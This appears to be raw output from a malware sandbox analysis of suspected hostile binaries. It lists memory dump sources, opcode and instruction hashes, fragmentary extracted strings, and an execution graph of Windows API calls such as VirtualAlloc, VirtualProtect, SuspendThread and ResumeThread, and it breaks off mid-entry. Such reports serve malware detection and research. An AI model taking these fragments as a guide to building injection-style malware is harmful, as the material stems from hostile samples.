                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 44306efb2767de7682b89b839b0bf6cb9879e6c7806c33359819b11fcfe0115f
                                                          • Instruction ID: 704edd46b85c2d5b510f2bee4d5ef38487e30d8121ec292dd29fe746f1080119
                                                          • Opcode Fuzzy Hash: 44306efb2767de7682b89b839b0bf6cb9879e6c7806c33359819b11fcfe0115f
                                                          • Instruction Fuzzy Hash: B7F0303090990E9FEB50FF58D84A6EEB7A1FF58345F500436E80CD2191DBB465E0C795
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eca2fd57520f8f7dbc863c4ae1433719470489daff1a2cf0c53d9c4f1a315965
                                                          • Instruction ID: 0c304f05dcb27e25b41ecb6a2a4fdb36a786103274e605fc0d4b462735e87fa6
                                                          • Opcode Fuzzy Hash: eca2fd57520f8f7dbc863c4ae1433719470489daff1a2cf0c53d9c4f1a315965
                                                          • Instruction Fuzzy Hash: 85F0DD7491895DCFDFA9EF98C894AACBBB1FB68301F210159800EE7691CA75A941DF40
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2341436525.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848a50000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8bc0a1301f76209d81a31f563c3654c8f321291b3f281a955a9f53598a19ffd5
                                                          • Instruction ID: 9d32df9aaa54d794f509e940abc8b49236fa89406b366cff4fa4b9b9dc5c9773
                                                          • Opcode Fuzzy Hash: 8bc0a1301f76209d81a31f563c3654c8f321291b3f281a955a9f53598a19ffd5
                                                          • Instruction Fuzzy Hash: D1F0963180A54A9FE725DB68C849BDDB7B1FF41354F1402F9C4185B056CA761D838F50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cb3fadd60c2f8cf130b9bb96bf1c3208d8978bc3bc4c04e78ea2522c33e4cac0
                                                          • Instruction ID: 9d6c5e81a416614abe8d1e2ac94977c823a5f29637f6484770d84aede3b49492
                                                          • Opcode Fuzzy Hash: cb3fadd60c2f8cf130b9bb96bf1c3208d8978bc3bc4c04e78ea2522c33e4cac0
                                                          • Instruction Fuzzy Hash: BFF0962290D7C28FEB729F648C555A47BE0EF17364B1D0AFAC4848B193C66C3415D715
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2341436525.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848a50000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e902c295088ca3f0aae8927514254e3e4783048ca509d345e551920dbc5063ad
                                                          • Instruction ID: da7d513cc13c214b23ab2449c30bffb3e7c65833a439d102c85a154930e593d1
                                                          • Opcode Fuzzy Hash: e902c295088ca3f0aae8927514254e3e4783048ca509d345e551920dbc5063ad
                                                          • Instruction Fuzzy Hash: EAF01C7081994E9FEB94FF68C84A6EA7BE0FF18345F404476E80CD2194DB74A5A0CB95
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2341436525.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848a50000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 124df9553767eda1251b8eed8c6715732471ae45d6970e9a3201d435152c61df
                                                          • Instruction ID: de0cf9cac07e11a43e13ba95c46c3beae596b24da949b27c5f28450eaa481c20
                                                          • Opcode Fuzzy Hash: 124df9553767eda1251b8eed8c6715732471ae45d6970e9a3201d435152c61df
                                                          • Instruction Fuzzy Hash: FBF01530408A0ECFDF94EF18C945AAA37A0FF28380F000565F41DC3154C774E9A0DB92
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2341436525.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848a50000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 08e9b59688bd223236f727ae2e521b46f6819ec6f607ed05ebb545f5bdecd4f9
                                                          • Instruction ID: aad163cc18ed124339373d35139a0344c7084ee7367619c015d20eb28305c852
                                                          • Opcode Fuzzy Hash: 08e9b59688bd223236f727ae2e521b46f6819ec6f607ed05ebb545f5bdecd4f9
                                                          • Instruction Fuzzy Hash: BAF04930A0D55ACFE704EF64C8552BDB3A2FB51351F000629C015A7282CBB86A848B96
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0750aacc1659fd66649e12006afd5582d10cadd08a876443aea9cffa99513152
                                                          • Instruction ID: d4d0de6cc71cfed59af87d9843af085e835ff2ee70516ac4199653609fdde403
                                                          • Opcode Fuzzy Hash: 0750aacc1659fd66649e12006afd5582d10cadd08a876443aea9cffa99513152
                                                          • Instruction Fuzzy Hash: 84E04F3589D6C8CFDB71EF1089964ECBF60BF10350F5611EBD50D46192EB2C66189A42
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d180ea79d5c5b9a62d517ad7efb655fe2c4baddbb5841ac58692d19562c2296a
                                                          • Instruction ID: b6259897bd23a9c1f9d2d40458102c164f968a5846efae320a926c5b9c59fa7b
                                                          • Opcode Fuzzy Hash: d180ea79d5c5b9a62d517ad7efb655fe2c4baddbb5841ac58692d19562c2296a
                                                          • Instruction Fuzzy Hash: C4E0EC10E1D6C29FE77A6B741895139BBE09F0B3D475509B9C14A8E2D3C95C28459B22
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                          • Instruction ID: 5b0c19e58a30fabf3f72155920812b47e11141bbc145f90de761b17560caac21
                                                          • Opcode Fuzzy Hash: f5c8676b47044bbb3c5db7628fae0690d09d220f5ca17a06c309ede9dc85c081
                                                          • Instruction Fuzzy Hash: 1CD0C954E0C5E3ADF139BE2140A827AD5916F013A0F66007ED47F418C1CD1CB8416E02
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6e37bb2e79912a93e1139b8f8559d073a9279fd1bb46ae7a7ce609ffa7029cfa
                                                          • Instruction ID: fd09b2796cfc911c29c9221a85d34fe2da962e5acac95b5f517ec426bcf9223f
                                                          • Opcode Fuzzy Hash: 6e37bb2e79912a93e1139b8f8559d073a9279fd1bb46ae7a7ce609ffa7029cfa
                                                          • Instruction Fuzzy Hash: 7AD0C916A0C6C38DF27DBE11412063A91915F017A0F62083EC4AF41CD1CD1C74427A02
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848bf0000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f1c7f846c288f1a5689faedfa56ea991cc73f1875e897d782aba949996292b8f
                                                          • Instruction ID: e82cb59ddbe53a6c4b106872531c6fdf95779e886e626a62bdf7560038d350b6
                                                          • Opcode Fuzzy Hash: f1c7f846c288f1a5689faedfa56ea991cc73f1875e897d782aba949996292b8f
                                                          • Instruction Fuzzy Hash: 5EB11753E0E9C25FE393A2B864161F96E927F53AD4B5D00F7D1841B08FB628AD19C389
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2343295650.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff848bf0000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d3efe6bc936a63ba784451ce8ef8158e07ced708347c8a635295c9071222542d
                                                          • Instruction ID: b000705e7d955b80668aaeaa29e60239d34c840e537a01bf232b87805dbf146f
                                                          • Opcode Fuzzy Hash: d3efe6bc936a63ba784451ce8ef8158e07ced708347c8a635295c9071222542d
                                                          • Instruction Fuzzy Hash: E331F470D18A1D8FCF84EF58D491AEDBBF1FBA9300F20116AD419E3681CB35A941CB44
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: =#I$ ?#I$ @#I$0=#I$0?#I$0@#I$8>#I$@=#I$@?#I$@@#I$H>#I$P=#I$P@#I$X>#I$`=#I$`@#I$h>#I$p=#I$p@#I$x>#I$<#I$=#I$>#I
                                                          • API String ID: 0-3449052517
                                                          • Opcode ID: 96353f7034cddad6cdbd12a0ec4e03eea44a9cc1696065b5316e3c5fbcf75c06
                                                          • Instruction ID: 87364cdbd621a9216979c0074e9e8d619253b4b6c3f277c02be248f78d0757a1
                                                          • Opcode Fuzzy Hash: 96353f7034cddad6cdbd12a0ec4e03eea44a9cc1696065b5316e3c5fbcf75c06
                                                          • Instruction Fuzzy Hash: F9C1CCA2E0FDC38FF1B42D74280A13AB6B5BFA5A6078A49BAC144075DF953DDE054BC4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0#I$@#I$@#I$p#I$p#I
                                                          • API String ID: 0-2025207965
                                                          • Opcode ID: 3698534b82d3363ac1a615b70fd86ebc185665304702c2abd3dac82a7a0ee361
                                                          • Instruction ID: 6add8cef141edf0fab857624d8f92fd88347228fb21fac1b808e089b01c14ad3
                                                          • Opcode Fuzzy Hash: 3698534b82d3363ac1a615b70fd86ebc185665304702c2abd3dac82a7a0ee361
                                                          • Instruction Fuzzy Hash: 99E1E662D0EAD18FF7769A745818174FFA0BF166A0B5D04FEC0894B0DBD45D9D09CB82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0#I$@#I$@#I$p#I$p#I
                                                          • API String ID: 0-2025207965
                                                          • Opcode ID: e9e214ec92f62b8e5d8c6c2e60504c4d1c0a709a4ec16b364e0016ba6f2697d8
                                                          • Instruction ID: f7e19e6349f83413772eeb53f976f4bac373c478943c97c6154d5aec96ab4652
                                                          • Opcode Fuzzy Hash: e9e214ec92f62b8e5d8c6c2e60504c4d1c0a709a4ec16b364e0016ba6f2697d8
                                                          • Instruction Fuzzy Hash: 4EE1E462D0EAD18FF3B69A745819134FFA0BF166A0B5D04FEC0C94B09BD46D9D09CB82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2349630661.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_7ff849150000_teh76E2k50.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (b!I$Hc!I$pb!I$pb!I
                                                          • API String ID: 0-1379385363
                                                          • Opcode ID: 29284943919636c9065059339ff089889239ee3ef8690219b788d145b58cd5fc
                                                          • Instruction ID: 7855710e289f642bf94eff05691d4f6951f5f8a7e326bd6e11c5bbba90829e3f
                                                          • Opcode Fuzzy Hash: 29284943919636c9065059339ff089889239ee3ef8690219b788d145b58cd5fc
                                                          • Instruction Fuzzy Hash: E5710572D0F6D25FE321BEB864620F9BFA0EF123F8B0945BBC18C49087D819590697C4

                                                          Execution Graph

                                                          Execution Coverage:5.8%
                                                          Dynamic/Decrypted Code Coverage:55%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:20
                                                          Total number of Limit Nodes:1
                                                          execution_graph 49161 7ff848a63d8d 49163 7ff848a63d97 49161->49163 49162 7ff848a63d5d 49163->49162 49164 7ff848a63e6d VirtualAlloc 49163->49164 49165 7ff848a63ec5 49164->49165 49166 7ff848c009f5 49167 7ff848c00a0f GetFileAttributesW 49166->49167 49169 7ff848c00ad5 49167->49169 49157 7ff848a6239e 49158 7ff848a623ad VirtualProtect 49157->49158 49160 7ff848a624ed 49158->49160 49174 7ff848bfd35d 49175 7ff848bfd36b SuspendThread 49174->49175 49177 7ff848bfd444 49175->49177 49178 7ff848bfecd9 49179 7ff848bfece7 CloseHandle 49178->49179 49181 7ff848bfedc4 49179->49181 49170 7ff848bfeb78 49171 7ff848bfebb3 ResumeThread 49170->49171 49173 7ff848bfec84 49171->49173

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2519874170.00007FF848A6B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A6B000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848a6b000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `J_H
                                                          • API String ID: 0-575383600
                                                          • Opcode ID: 6378f93f351895cc09fa3cf471f3eca5e82f8b312fa5133cd8b6ad95259d066c
                                                          • Instruction ID: c2e66f0943d83d814c6a73c76b3d11d477a54b2e0ef97b1d5601d59be9ba1f53
                                                          • Opcode Fuzzy Hash: 6378f93f351895cc09fa3cf471f3eca5e82f8b312fa5133cd8b6ad95259d066c
                                                          • Instruction Fuzzy Hash: A0031970D099198FDB98EF18C895BA9B7B1FF98340F1042E9C04DE3296CB75AA81CF55
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF849150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849150000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849150000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a6e5da392164538af4b1382df770ea96b98c4003ca030b6b63f359bee0951e8c
                                                          • Instruction ID: ccb26704d096dee5bd8f63676ff70c1f507e80613dccb436b6eca018745ee293
                                                          • Opcode Fuzzy Hash: a6e5da392164538af4b1382df770ea96b98c4003ca030b6b63f359bee0951e8c
                                                          • Instruction Fuzzy Hash: 12529F3091C69A8FDB6DDF18C4906B8BBB1FF49350F9541BDD45AC7286CA38A982CF41
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2519874170.00007FF848A9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A9A000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848a9a000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3e92210dd07a1dabb1fcde8e1eca30ba7f0271d1cf2627ff1b5581cba1d00254
                                                          • Instruction ID: 73a705916a80ee2dbd13e1a714da5356e79b6d892a709d5c1b3f77b135b7ac86
                                                          • Opcode Fuzzy Hash: 3e92210dd07a1dabb1fcde8e1eca30ba7f0271d1cf2627ff1b5581cba1d00254
                                                          • Instruction Fuzzy Hash: 10221670D086198FDB44DFA8C485AECFBF2FF48344F14866AD419AB245DB34A985CF64
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2519874170.00007FF848A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A50000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848a50000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 91ac919e2d1a1fa5b4baf873e32ffcfbf2816a356b96b4d17b09bbc731b559ab
                                                          • Instruction ID: 2b1225d2000e5020e7838bd0a4e3925a06eea4f055f439fbfe390d2498145b0f
                                                          • Opcode Fuzzy Hash: 91ac919e2d1a1fa5b4baf873e32ffcfbf2816a356b96b4d17b09bbc731b559ab
                                                          • Instruction Fuzzy Hash: FAA1AA71D19A8A8FE798EF68D8667BDBBE2FF55340F40017AC009D3292CBB818418B51

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2547650808.00007FF849390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849390000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `<6I$`<6I
                                                          • API String ID: 0-803607174
                                                          • Opcode ID: 058addbdf940f525c7ebe69883ac08ee64fe7d759f53e713fb1df137e470e846
                                                          • Instruction ID: 4b4cda6a8f8a9f135bc195aab570bcc03c517f35a030f564d2dc7873181711c0
                                                          • Opcode Fuzzy Hash: 058addbdf940f525c7ebe69883ac08ee64fe7d759f53e713fb1df137e470e846
                                                          • Instruction Fuzzy Hash: 5B126670A1895D8FDFA8EF18D898FA977B1FB69345F1001A9D00EE7261DA35AD81CF40

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF84915B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84915B000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff84915b000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: V*I$V*I
                                                          • API String ID: 0-684352607
                                                          • Opcode ID: b2c2648f1fd91d198394da882038f3d33d9f09a4323d18801fc73efe6dd22bfd
                                                          • Instruction ID: 54309256bb987e31ff032c28db36e07771d1d866a850ae59def99ee0f0568b92
                                                          • Opcode Fuzzy Hash: b2c2648f1fd91d198394da882038f3d33d9f09a4323d18801fc73efe6dd22bfd
                                                          • Instruction Fuzzy Hash: 6231E231E0D98A9FF76AAE2840596BA73A2FF94790F000439D00FC7285DE3C6C068F81

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2547650808.00007FF849390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849390000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `<6I
                                                          • API String ID: 0-2970573994
                                                          • Opcode ID: f57250585b184a015fbca1cbcf3e76d1c485423cfcb9271029c4e391eb8d43e0
                                                          • Instruction ID: c03564ac0a239108f3d840387d9cc024b8935fa9a8625002c0d5db84d6b3a94a
                                                          • Opcode Fuzzy Hash: f57250585b184a015fbca1cbcf3e76d1c485423cfcb9271029c4e391eb8d43e0
                                                          • Instruction Fuzzy Hash: 15222674A5891D8FDF99EF18D898BA9B7B1FB68305F1041D9D00EE7261DA31AE81CF40

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2532781571.00007FF84915B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF84915B000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff84915b000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Q^H
                                                          • API String ID: 0-138190856
                                                          • Opcode ID: f14501856c21238a57a5e4f86283e0d5920f5b73e70fb0d1d027f62756b0b0c8
                                                          • Instruction ID: 2be9791e12d0d9d5361ece739cf91acc7e0d6093b6f149331dd1b7ec75012b05
                                                          • Opcode Fuzzy Hash: f14501856c21238a57a5e4f86283e0d5920f5b73e70fb0d1d027f62756b0b0c8
                                                          • Instruction Fuzzy Hash: DFE1B735E1DACA8FE7A5EF288454678B7E2FF55350F5A00BAC40DC7292DE28AC45CB41

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 769 7ff848a6239e-7ff848a623ab 770 7ff848a623ad-7ff848a623b5 769->770 771 7ff848a623b6-7ff848a623c7 769->771 770->771 772 7ff848a623c9-7ff848a623d1 771->772 773 7ff848a623d2-7ff848a624eb VirtualProtect 771->773 772->773 778 7ff848a624ed 773->778 779 7ff848a624f3-7ff848a62543 773->779 778->779
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2519874170.00007FF848A5E000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848A5E000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848a5e000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 23f3c3e895f7c8a09aa26ca0f4dab3b73836174b37067930d6f0e4cfcba22d98
                                                          • Instruction ID: 18d9ae28a334f234d2e908ce25eda42ba9b9b3827620eb69450a754429b95178
                                                          • Opcode Fuzzy Hash: 23f3c3e895f7c8a09aa26ca0f4dab3b73836174b37067930d6f0e4cfcba22d98
                                                          • Instruction Fuzzy Hash: 84516D70D0964D8FDB54DFA8C885AEDBBF1FF66310F10426AD049E3256DB74A885CB81

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 782 7ff848bfeb78-7ff848bfebb1 783 7ff848bfebb4-7ff848bfec82 ResumeThread 782->783 784 7ff848bfebb3 782->784 788 7ff848bfec84 783->788 789 7ff848bfec8a-7ff848bfecd4 783->789 784->783 788->789
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2524261804.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848bf0000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 8906db486cdddec348b7a80142d95f0adbd4e7a2fe5251d16733a8dc3471fa3e
                                                          • Instruction ID: 6a495d07ad291466dadfe7aab156e55d06a2d7d8eb0751ff3bc10f480f7ee8f0
                                                          • Opcode Fuzzy Hash: 8906db486cdddec348b7a80142d95f0adbd4e7a2fe5251d16733a8dc3471fa3e
                                                          • Instruction Fuzzy Hash: 38516A7090C78C8FDB55DFA8D895AE8BFF0EF56310F1441ABD089DB292DA359846CB11

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 792 7ff848bfd35d-7ff848bfd369 793 7ff848bfd374-7ff848bfd442 SuspendThread 792->793 794 7ff848bfd36b-7ff848bfd373 792->794 798 7ff848bfd444 793->798 799 7ff848bfd44a-7ff848bfd494 793->799 794->793 798->799
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2524261804.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848bf0000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID: SuspendThread
                                                          • String ID:
                                                          • API String ID: 3178671153-0
                                                          • Opcode ID: c555b1c2400e85e838d1995b34c28c5c546c70852d89ed642919398b0a78e709
                                                          • Instruction ID: 3e7066691dbbb917a8ddff009c5b9e6823d3e6ce464b5f4d30d26d4b99df738d
                                                          • Opcode Fuzzy Hash: c555b1c2400e85e838d1995b34c28c5c546c70852d89ed642919398b0a78e709
                                                          • Instruction Fuzzy Hash: 14413B70D08A4D8FDB98EFA8D885BEDBBF0FB5A310F14416AD049E7252DB70A845CB45

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 802 7ff848c009f5-7ff848c00ad3 GetFileAttributesW 806 7ff848c00ad5 802->806 807 7ff848c00adb-7ff848c00b19 802->807 806->807
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2524261804.00007FF848BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BF0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff848bf0000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: b3b43a7336e14719ff5f912a42fab9b740ed2b32a7d4bf22b0deaaad11e7cb58
                                                          • Instruction ID: f511b793727b90f7a040f195f761a182e5fbf1951b6b979d6f865b1534912e0a
                                                          • Opcode Fuzzy Hash: b3b43a7336e14719ff5f912a42fab9b740ed2b32a7d4bf22b0deaaad11e7cb58
                                                          • Instruction Fuzzy Hash: 0A41F870E0864C8FDB98EF98D885BEDBBF0FB5A310F10416AD049E7252DA75A845CF45

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2547650808.00007FF849390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849390000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: `<6I
                                                          • API String ID: 0-2970573994
                                                          • Opcode ID: 191136647227920b1a95b4d1512e56122c5b3288f9c55ca5724d8b3c1a24405a
                                                          • Instruction ID: 477b6b65c286cbc3c720fa9e109bf92b748ad034b77276a8c05ae8bbee694f07
                                                          • Opcode Fuzzy Hash: 191136647227920b1a95b4d1512e56122c5b3288f9c55ca5724d8b3c1a24405a
                                                          • Instruction Fuzzy Hash: 82D16774A1891C8FDFA9EF18D894BA977B5FB69305F1041D9D00EE7261DA31AE81CF40

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.2547650808.00007FF849390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_7ff849390000_wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: X09I
                                                          • API String ID: 0-168978767
                                                          • Opcode ID: a8a896f83819f0724fb48e5638a97ed11e64ecf167fe5f53e19778d1fd8da585
                                                          • Instruction ID: 0a37e17193e42d15c61456d1e1da1d24a0cc252f7dcea26f2467db38f6138eff
